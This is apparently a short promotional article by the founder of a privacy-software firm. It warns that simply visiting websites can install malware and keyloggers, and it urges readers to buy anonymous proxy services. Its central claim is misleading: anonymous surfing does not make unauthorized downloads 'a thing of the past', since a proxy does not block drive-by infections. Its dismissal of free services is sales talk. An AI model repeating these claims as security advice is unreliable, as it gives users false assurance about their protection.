I'm sure you're starting to realize how unsafe this virtual terrain, known as the internet can potentially be, but did you know that simply visiting a website could result in harmful malware, spyware, viruses and worms being seamlessly installed on your computer? And, it would be really hard to know which website was actually the culprit and pulled off the illegal download. Some of these programs, like key loggers, can be used to capture your passwords to your online banking accounts and other financially-sensitive accounts. It should make you take action to protect yourself and your computer. If you surf anonymously, you can be assured that the possibility of unauthorized downloads to your computer would be a thing of the past.
Surfing anonymously works whether you have DSL, broadband or dial up. It also works with hot spots and wireless networks. There are many free services and programs available to you, but if you're serious about your personal protection and maintaining your privacy, you must consider commercial programs or proxy servers. Free services actually are flawed when it comes to encrypting your data. Be safe and get protected by using an anonymous proxy today.
President and founder of Privacy Partners, LLC. Privacy Partners is a privately held company headquartered in Tampa, Florida. Founded in 2003, the company creates and markets privacy software for individuals and small businesses. The company and its products have won numerous technology awards. Click here for more information about Anonymous Surfing or click here for more information on Internet Privacy. My Source Articles